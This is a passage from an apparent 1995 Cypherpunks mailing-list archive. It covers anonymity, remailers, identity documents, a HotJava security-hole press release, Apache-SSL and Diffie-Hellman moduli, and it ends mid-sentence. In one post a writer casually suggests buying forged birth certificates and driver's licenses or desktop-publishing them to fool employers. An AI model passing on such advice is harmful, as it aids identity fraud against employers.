>> Charlie, and Bob stole the coins.  He launders them through Ed's
>> service.  Charlie never got the cash, and Alice complains to the bank
>> that the coins were stolen.  The bank says, fine, we can identify the
>> perpetrator, let's see... it's Ed.  Ed is now charged with theft and
>> has an expensive and uncertain legal experience ahead of him.
>
>Jumping in hastily:
>
>It seems to me that Ed faces a larger problem if the above scenario turns
>out to be a viable attack. Consider the following sequence: Alice and
>Charlie decide to get some (payee-anonymous) currency laundromat in hot 
>water. Alice (payer-anonymously) washes some coins at the laundromat.
>Con-man Charlie claims he didn't get paid for some fictional transaction with
>Alice. Alice complains to the bank, and the rest proceeds as before. The
>Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>situation from the bank's perspective.
>

Wouldn't the ability to have the bank prove that the coins were 'cashed'
make this all null and void? The only way this would work would be if
Charlie is willing to completely forego cashing in the coins, *ever*. Should
he cash them in later, Ed would seem to have grounds for suspicion/complain.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From unicorn at polaris.mindport.net  Mon Nov  6 03:35:01 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 6 Nov 1995 19:35:01 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <Pine.SUN.3.91.951106061220.8722D-100000@polaris.mindport.net>


On Sun, 5 Nov 1995, Duncan Frissell wrote:

> >> Consider this: most people in the U.S. do not have a "credential" that
> >> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> >> passports.)
> 
> My passport is always close at hand.  I love an unchallengeable credential
> that has neither my address nor my SS# on it.  I also carry my birth
> certificate which I use for most non-driving interactions.  It doesn't have
> much useful info on it.  Secured credit cards which can be obtained in any
> name are also handy.  

I have often found and come across considerable problems using a 
passport, local or foreign, as identification.  Many estlablishments 
simply refuse to accept them, as if they are inferior somehow to the 
non-standardized frequently forged allmighty driver's license.  This is 
mostly ignorance and a lack of common reference, as few americans 
actually HAVE these documents, or have even SEEN them.  (No, I'm not 
kidding).  I found this particularly distressing in D.C.  To some degree 
it's institutional, where recording a "drivers license number" on some 
form becomes problematic for the $5.50 and hour clerk who can't find the 
field "driver's license number" anywhere on the passport.

While I just take my business elsewhere when that is possible, I think 
it's interesting to note how desperatly people cling to the social 
security number and completely inept identifications like state issued 
licenses as if to let go would mean a decent into the bleeding hell of 
anarchy.  (In its popularly assumed and feared form)


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From fc at all.net  Mon Nov  6 03:58:37 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:58:37 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <9511061141.AA16901@all.net>


Anonymous wrote:
> On Sat, 4 Nov 1995 don at cs.byu.edu wrote:
> 
> > An anonymous complainer writes:
> > 
> > >Well, Perry, my opinion is that there is far too much noise on this list 
> > >as it is.  I have already seen my words drowned out by bellyaching over 
> > >next to nothing.
> > 
> > POT-KETTLE-BLACK.
> > 
> > Also, since nothing you've written (in your commentary, as opposed to
> > anonymous announcements or releases that most people use anonymity for
> > here) indicates that you're using anonymity for any particular reason,
> 
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.  I don't believe that
> anyone should be placed on the defensive, for *choosing* to maintain
> some semblance of a personal life, or wishing to maintain some
> illusions that they might still have some shred of personal privacy
> left.  Hopefully, we can still leave a man with his dignity.

In the United States, we have the right to express whatever view we
wish, so long as it doesn't endanger others (e.g., insight to riot,
scream "fire" in a crowded theater when there is no fire, etc.). 
Everyone has an inherent right to question why a person seeks moments of
anonymity or privacy. 

As far as people being placed on the defensive, if you want to be
defensive it's your choice.  In terms of understanding what you say,
without understanding the WHY, it's harder to understand and evaluate
the WHAT.

When people use the cover of anonymity to make attempts at character
assasination, they WHY certainly seems a central issue.  Is it that the
people who post such attacks are cowards? Do they have ulterior motives?
Or are they simply upset about something else in their life and taking
it out on others.  Are they using anonymity to prevent responsibility or
association? Are they afraid of retribution?  Without understanding the
motive, their postings cannot be truly understood.

> I should not have to defend my right to present my ideas as I believe
> are appropriate to the circumstances.  My choice to present the idea,
> that an entire economic sector needs to carefully reevaluate their
> strategic choices, and their discovered hidden security attitudes -- will 
> stand or fall strictly on its merits.  The debate is not advanced in any 
> way by attaching a reputation to the question.

You don't have to defend anything, but the debate is certainly advanced
by attaching reputation.  If you were an investment banker and making
major investment decisions on a daily basis without understanding the
issue, it would being a very different understanding to our reading than
if you were a high school student.  The reason is that content without
context is devoid of meaning.  The more context we have, the more
meaning we can attributed to your content. 

> Like any other person, I have my skeletons, and I have my regrets.  I 
> certainly have unfinished, unresolved, issues that I need to tend to.  In 
> that sense, I am no different than any other man.  I also realize that 
> ultimately, I'll have to come forward from behind the veil of secrecy 
> which is provided to me.  

Why wait? We have a special on truth available only today.  Tell us who
you are and we will forgive all past sins (mortal sins not included,
void where prohibited).

> This I will do, after I have reconciled my own security considerations.

Ah - probably void there.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.  That inherent right, should be
> extended to any man, and no man should be called to account for his 
> desire to maintain his personal privacy, no matter how arbitrary his
> reasons.

Your privacy is yours, but the content of your messages continues to be
degraded by the lack of adequate context for their interpretation.

> Especially when he comes forward to challenge Goliath.

David had only a slingshot.  An anonymous remailer would have reduced
his risks too.

...

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From s1113645 at tesla.cc.uottawa.ca  Mon Nov  6 05:58:57 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 21:58:57 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <9511061141.AA16901@all.net>
Message-ID: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>




On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> In the United States, we have the right to express whatever view we
> wish, so long as it doesn't endanger others (e.g., insight to riot,
> scream "fire" in a crowded theater when there is no fire, etc.). 
> Everyone has an inherent right to question why a person seeks moments of
> anonymity or privacy. 

You're forgetting our good friends the libel laws. Another reason to go anon.
You have the right to say whatever you please, but you'll have to be able 
to defend it in court if it damages someone's reputation. It can also get 
you fired. (or shot if you're MLK) 

This is why It'd be so nice to see more idiot-friendly remailer clients
on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
The average person can really benefit from easy anonymity, otherwise they 
won't bother and get in hot water.

Slander is in the eye of the beholder.





From E.J.Koops at kub.nl  Mon Nov  6 06:09:47 1995
From: E.J.Koops at kub.nl (Bert-Jaap Koops)
Date: Mon, 6 Nov 1995 22:09:47 +0800
Subject: Crypto Law Survey - updated and online
Message-ID: <MAILQUEUE-101.951106143524.384@frw3.kub.nl>


I have updated my survey of cryptography regulations worldwide. It is 
available at URL

http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Please set pointers to this URL rather than copy the file, as I 
intend to regularly (i.e., about once every two months) update the 
survey. 

I greatly appreciate comments, corrections, and additional 
information.

Bert-Jaap Koops
Center for Law and Informatization
Tilburg University
The Netherlands





From s1113645 at tesla.cc.uottawa.ca  Mon Nov  6 06:11:20 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 22:11:20 +0800
Subject: Magic Money
In-Reply-To: <951106025715_99002994@emout06.mail.aol.com>
Message-ID: <Pine.3.89.9511060823.A27224-0100000@tesla.cc.uottawa.ca>




On Mon, 6 Nov 1995 EWilhem at aol.com wrote:

> Where do I get the software, Please E-mail me at roger12 at cam.org. I'd like
> the 
> evaluation software.
> 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/magic-money
It's freeware as far as I know.
Just curious folks, is anyone still using this? Was there ever any active 
playing with it? What's the story? (if there is one)

Ps. Is that the cam in Montreal?






From fc at all.net  Mon Nov  6 06:18:46 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 22:18:46 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511061335.AA24370@all.net>


s1113645 at tesla.cc.uottawa.ca typed:

> On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
> 
> > In the United States, we have the right to express whatever view we
> > wish, so long as it doesn't endanger others (e.g., insight to riot,
> > scream "fire" in a crowded theater when there is no fire, etc.). 
> > Everyone has an inherent right to question why a person seeks moments of
> > anonymity or privacy. 
> 
> You're forgetting our good friends the libel laws. Another reason to go anon.
> You have the right to say whatever you please, but you'll have to be able 
> to defend it in court if it damages someone's reputation. It can also get 
> you fired. (or shot if you're MLK) 

The anonymity will not protect you very well against libel laws.  The
provider will be suied for libel, and unless they reveal your identity,
they will likely lose in court.  If they cannot reveal the identity,
they will also likely lose the suit.  All the anonymous providers are
doing is giving you anonymity in exchange for their liability.  Even
international anonymity systems are not imune to such threats, as we have
been shown by the Church of whatever.

> This is why It'd be so nice to see more idiot-friendly remailer clients
> on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
> The average person can really benefit from easy anonymity, otherwise they 
> won't bother and get in hot water.

If it's just a license to slander people, I don't want to support
anonymity.  There are valid reasons for remaining anonymous, but being
able to avoid liability for slander is not one of them.

> Slander is in the eye of the beholder.

Slander is in the realm of the courts to decide - at least in the U.S.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From perry at piermont.com  Mon Nov  6 06:24:54 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 22:24:54 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511060639.WAA20500@jobe.shell.portal.com>
Message-ID: <199511061357.IAA14010@jekyll.piermont.com>



Someone adopting Detweilers style writes:
> Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
> really makes some of us outsiders wonder what the IETF actually does in 
> its gilded white towers.

Just so that people understand this is a Detweiler troll, and an
attempt by him to start up a flame war/fight.

The IETF is perhaps the single easiest technical standards
organization in the world to participate in. You join the mailing list
for any working group and you are as full a member as you can be. Show
up at any IETF meeting, and you are a full participant. All
discussions occur in the open, are posted on line, most meetings are
broadcast worldwide on the MBONE. All drafts are public, all documents
are free.

Detweiler of course knows this, but would like us to argue with him,
and hopefully with each other.

Perry





From s1113645 at tesla.cc.uottawa.ca  Mon Nov  6 06:28:41 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 22:28:41 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511060807.B27490-0100000@tesla.cc.uottawa.ca>




On Mon, 6 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> And as the messenger, I (hope) I don't have anything to fear, from the NSA
> or any other foreign group that would seek to pursue its own agenda within
> the borders of sovereign Canada.  I really don't think that the NSA is
> "evil incarnate", as some list subscribers do.  They have their
> intelligence and know how to use it.  Usually, they use it prudently.
 
They have a nice friend (the author of Spyworld would say outpost) right here
in Ottawa at the Communications Security Establishment. They (CSE) seem to 
have done some recent spying on the opposition parties and Quebec 
separatists (so I vaguely recall having read in several places. I haven't 
gotten around to Spyworld yet). It was rather funny to see them 
recruiting on campus. If you're ever in town, they're just a bit past 
Carleton U. on Heron. (it doesn't say CSE on the signs, but the guy at the
gate will tell you so)

Try <http://www.cse.dnd.ca> it's a tad sparse, but entertaining all the same.
They have very friendly recruiting brochures. Like NSA, they're also an equal
opportunity employer (;-> ).







From perry at piermont.com  Mon Nov  6 06:34:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 22:34:55 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <199511061404.JAA14024@jekyll.piermont.com>



anonymous-remailer at shell.portal.com writes:
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.

In your case, Detweiler, it appears to be because you want to cause us
to flame at each other and disrupt the list without our noticing who
is responsible. I'd say that is a questionable motive.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.

You already have.

> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

.pm





From dreschs at mpd.tandem.com  Mon Nov  6 06:35:06 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Mon, 6 Nov 1995 22:35:06 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511061406.IAA07351@galil.austnsc.tandem.com.>


shields at tembel.org (Michael Shields) said:

MS> If the InterNIC yanked your domain, this would *not* affect your IP
MS> connectivity -- your ability to be reached by any Internet protocol
MS> via IP address.  The InterNIC has nothing at all to do with that.

	I never disputed that subverting the DNS system would affect the
ability to use numeric IP addresses, just IP names.  But knowing that
there are multiple 'root' DNS servers makes me a bit more comfortable.
But only a little bit - despite my being one of what is generally
referred to as the 'religious right', the pro-censorship tendencies of
the political 'leaders' pandering to it makes me very uncomfortable (the
"and when they came to censor me, no one was left to protest" concept
[with apologies to the writer of the original version referring to the
Holocaust]).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From koontz at MasPar.COM  Mon Nov  6 07:53:58 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Mon, 6 Nov 1995 23:53:58 +0800
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <9511061431.AA15525@argosy.MasPar.COM>


>   James Kallstrom, assistant FBI director in charge of the
>   New York field division, argues that the proposal would in
>   fact reduce the FBI's surveillance authority. "Today ... we
>   could tap all the phones in the United States," he said,
>   referring to older, pre-digital technology. Under the plan,
>   the FBI's surveillance ability would shrink to a maximum of
>   1 percent of simultaneous telephone calls from any one
>   telephone switch, he said.

Doublespeak.  2 legs good 4 legs better.





From raph at CS.Berkeley.EDU  Mon Nov  6 07:57:18 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 6 Nov 1995 23:57:18 +0800
Subject: List of reliable remailers
Message-ID: <199511061450.GAA24989@kiwi.cs.berkeley.edu>


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail at extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney at shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal at alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere at bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail at c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon at anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer at ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer at utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer at flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer at rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster at remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx at c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer at bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller at c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster at vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo at c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer at replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer at valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer at armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"precip"} = "<mixmaster at mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail at ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono at valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer at utopia.hacktic.nl       *********+**     8:54  99.98%
portal   hfinney at shell.portal.com         ###--###**--    46:06  99.98%
ideath   remailer at ideath.goldenbear.com   --.-----_.-- 10:46:11  99.98%
wmono    wmono at valhalla.phoenix.net       ************    12:41  99.97%
ecafe    remail at ecafe.org                 *##*#*##*#*#     1:06  99.97%
alumni   hal at alumni.caltech.edu           *+#--***+*--    46:01  99.97%
robo     robo at c2.org                      #--*##.#*#*#    10:10  99.92%
spook    remailer at valhalla.phoenix.net    * *+********    12:11  99.92%
penet    anon at anon.penet.fi               --+++-----+   3:25:44  99.90%
replay   remailer at replay.com               * ******+**     7:06  99.88%
mix      mixmaster at remail.obscura.com      ----------   1:59:30  99.75%
rmadillo remailer at armadillo.com           ++++++++++ +    39:58  99.58%
bsu-cs   nowhere at bsu-cs.bsu.edu            #-+#* *##++    13:47  99.23%
ford     remailer at bi-node.zerberus.de     ________ .   78:53:54  99.04%
syrinx   syrinx at c2.org                    __ .+-+--+++ 15:25:24  98.98%
flame    remailer at flame.alias.net          **+***+ +**    22:20  98.00%
vishnu   mixmaster at vishnu.alias.net        +*******-*+    22:47  97.99%
rahul    homer at rahul.net                  +#*****+-**+     9:18  99.95%
c2       remail at c2.org                    +-- **.*  -     46:46  86.40%
extropia remail at extropia.wimsey.com       - -..-       10:09:23  31.33%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From sameer at c2.org  Mon Nov  6 09:00:50 1995
From: sameer at c2.org (sameer)
Date: Tue, 7 Nov 1995 01:00:50 +0800
Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511061552.HAA06343@infinity.c2.org>


For Immediate Release
Date: Nov 6th, 1995
Contact: Sameer Parekh 510-601-9777 sameer at c2.org

PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

Two Princeton University grad students, Dan Wallach and Drew Dean,
recently discovered holes in Sun Microsystem's HotJava web browser. In
response to this finding, Community ConneXion, well known for offering
rewards for exposing holes in internet security products, has decided
to award them with a t-shirt and expand the Community ConneXion Hack
line of promotions to include Java and Java-related products.

Sun's Java product is alleged to allow people browsing the
World-Wide-Web to execute programs on their own computers without
worrying about whether or not the programs were viruses or not. The
holes Wallach and Dean found show that there are a few things in the
HotJava alpha implementation of the Java language which make viruses
and other malicious programs possible within the alpha HotJava
web browser.

"We were very impressed with the HotJava concept, so we thought it
would be good to poke around their implementation," said Wallach.
"While we did find some interesting holes, we believe these can be
addressed and Java could make a good standard for remote code on the
Web, if an effective security policy is defined."

Wallach and Dean released their findings initially in the RISKS
Digest, and plan to publish a paper detailing their results. The holes
they found make it possible for a malicious applet to set things up so
as to be able to monitor or modify all of a given web-surfer's
activity, after they ran the malicious applet exploiting the holes. By
doing so the applet may make it possible to violate user's privacy by
revealing to an third party their web traffic.

The holes they found exist only in the alpha release of HotJava. The
beta release, which is the version found in the widely-used Netscape
Navigator 2.0b1J is not vulnerable to these attacks.

"I don't want to be in the t-shirt business," said Sameer Parekh,
President of Community ConneXion, "but we felt that these students'
work deserved a t-shirt. Java has great potential for making the
Internet much more powerful than it already is. It is very important
that we examine Java and make sure that we can trust it." Community
ConneXion, in addition to this Hack Java t-shirt promotion, is
offering t-shirts to people who find holes in Netscape, Microsoft, and
DigiCash.

Information about the Hack Java promotion is available from
http://www.c2.org/hackjava/.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info at c2.org.

Java and HotJava are trademarks of Sun Microsystems, Inc. Netscape and
Netscape Navigator are trademarks of Netscape Communications
Corporation. The Hack Java promotion is not affiliated with nor
sponsored by Sun Microsystems.





From lharrison at mhv.net  Mon Nov  6 09:02:02 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 7 Nov 1995 01:02:02 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511061509.AA10512@mhv.net>


At 08:06 AM 11/6/95 -0600, Stan Drescher wrote:
>shields at tembel.org (Michael Shields) said:
>
>MS> If the InterNIC yanked your domain, this would *not* affect your IP
>MS> connectivity -- your ability to be reached by any Internet protocol
>MS> via IP address.  The InterNIC has nothing at all to do with that.
>
>	I never disputed that subverting the DNS system would affect the
>ability to use numeric IP addresses, just IP names.<snip>


  There has been a thought that's been in the back of my mind while reading
this thread. For example, at one time, the telephone companies used "names"
such as Klick 5-1234.  Later, they went to all numbers, i.e., 555-1234.
People balked, but they eventually got used to it.  There are other examples
not necessary to list here.
  If, however, the growth continues with people, not only accessing the net,
but getting domain names - doesn't it seem likely that, at some point, only
IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
  Ergo, what is the problem with having a numerical URL?  After all, some
people's URL's (in name form) are not the easiest to remember.  In the long
run, numbers may be easier to remember.  Just think of how many numbers
(Soc. Sec. #'s; phone #'s; tax #'s, etc.) that we have committed to memory.
Plus, one doesn't have to worry about InterNIC yanking your domain - and
other related problems.
  Just my .02 cents worth....
  

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison at mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************







From perry at piermont.com  Mon Nov  6 09:11:21 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 01:11:21 +0800
Subject: lp ?
In-Reply-To: <199511061539.HAA04245@hammerhead.com>
Message-ID: <199511061605.LAA14164@jekyll.piermont.com>



Thaddeus J. Beier writes:
> So, if this person was sending cryptographics codes from Switzerland
> to Israel, the code would have been imported to the US, then exported
> by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
> but it might be something to threaten UUNET with if one of their Northern
> Virginia neighbors ever wanted something the couldn't get otherwise.

It isn't clear that telecoms treaties don't implicitly make this legal
in spite of the export regulations.

Perry





From sameer at c2.org  Mon Nov  6 09:18:06 1995
From: sameer at c2.org (sameer)
Date: Tue, 7 Nov 1995 01:18:06 +0800
Subject: SSL-encrypted apache web server available for beta-test
Message-ID: <199511061607.IAA07644@infinity.c2.org>


	I put together an SSL/Apache using mostly other people's work,
but some of my own. It's available for beta-test to use non-commercial
to US-persons. See http://www.c2.org/apachessl/

	The README is attached.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org
"I don't want to get into the t-shirt business."

	The release of Apache supports SSL, using Eric Young's SSLeay
package and RSADSI's RSAREF cryptography library. Ben Laurie
<ben at algroup.co.uk> wrote the interfaces to SSL within the Apache server,
which was developed by the Apache Group.

	This release of Apache-SSL is maintained by sameer
<sameer at c2.org>. For more information on sameer's releases of
Apache-SSL see http://www.c2.org/apachessl/.

	For more information on Apache see http://www.apache.org/

	For more information on SSLeay see
http://www.psy.uq.oz.au/~ftp/Crypto/

	For more information on RSAREF see http://www.rsa.com/

	Portions developed at the National Center for Supercomputing
Applications at the University of Illinois at Urbana-Champaign. This
product includes software developed by Ben Laurie for use in the
Apache-SSL HTTP server project.

	Use of this software is allowed for non-commercial use only,
as described in the RSAREF license. For information on commercial use
of this software, please see http://www.c2.org/apachessl/.

	This package is using Apache 0.8.14 -- not the most recent
version of Apache. While every effort will be made to keep this
package up to date with the most recent Apache version, that can not
be guaranteed.





From frissell at panix.com  Mon Nov  6 09:27:27 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 7 Nov 1995 01:27:27 +0800
Subject: using PGP only for digital signatures
Message-ID: <199511060208.VAA14123@panix.com>


>> Consider this: most people in the U.S. do not have a "credential" that
>> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
>> passports.)

My passport is always close at hand.  I love an unchallengeable credential
that has neither my address nor my SS# on it.  I also carry my birth
certificate which I use for most non-driving interactions.  It doesn't have
much useful info on it.  Secured credit cards which can be obtained in any
name are also handy.  

>A green card, by itself, also fails to prove legal status.

Don't "green cards" have pictures now.  If they do they should be usable to
prove both status and identity.  I'm talking about the new "renewable" ones.

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B. 

You need proof of citizenship or residency and proof of identity.  Passport
and naturalization papers work for both.  Otherwise you have to pay the $25
to the guy on the corner for a birth certificate and drivers license.  Or
DTP it yourself since employers aren't very good at checking papers.  Or
dodge the whole thing and work for yourself.

DCF

"Who am us, anyway?"






From bal at martigny.ai.mit.edu  Mon Nov  6 09:46:44 1995
From: bal at martigny.ai.mit.edu (Brian A. LaMacchia)
Date: Tue, 7 Nov 1995 01:46:44 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511051607.LAA08575@jekyll.piermont.com>
Message-ID: <9511061646.AA25242@toad.com>


   X-Authentication-Warning: jekyll.piermont.com: Host localhost didn't use HELO protocol
   Cc: cypherpunks at toad.com, ipsec-dev at eit.com
   Reply-To: perry at piermont.com
   X-Reposting-Policy: redistribute only with permission
   Date: Sun, 05 Nov 1995 11:07:25 -0500
   From: "Perry E. Metzger" <perry at piermont.com>
   Sender: owner-cypherpunks at toad.com
   Precedence: bulk

   "William Allen Simpson" writes:
   > Folks, I was somewhat disappointed in the response to our previous
   > requests for verification of the strength of the prime moduli.
   > 
   > Recently, someone asked for a smaller prime of only 512-bits for speed.
   > This is more than enough for the strength of keys needed for DES, 3DES,
   > MD5 and SHA.  Perhaps this would be easier to have more complete and
   > robust verification as well.

   I think that this is a very large mistake. Allow me to explain why.

   La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
   that once you've done enough precalculation on a particular modulus,
   you can break any subsequent Diffie-Hellman operation performed on
   that modulus with (for our purposes) no effort. 512 bits is, from what
   I can tell, not far out of the realm of possibility for what someone
   could try to crack with current machines given enough effort.

Perry is correct; allow me to add some details.  The discrete log
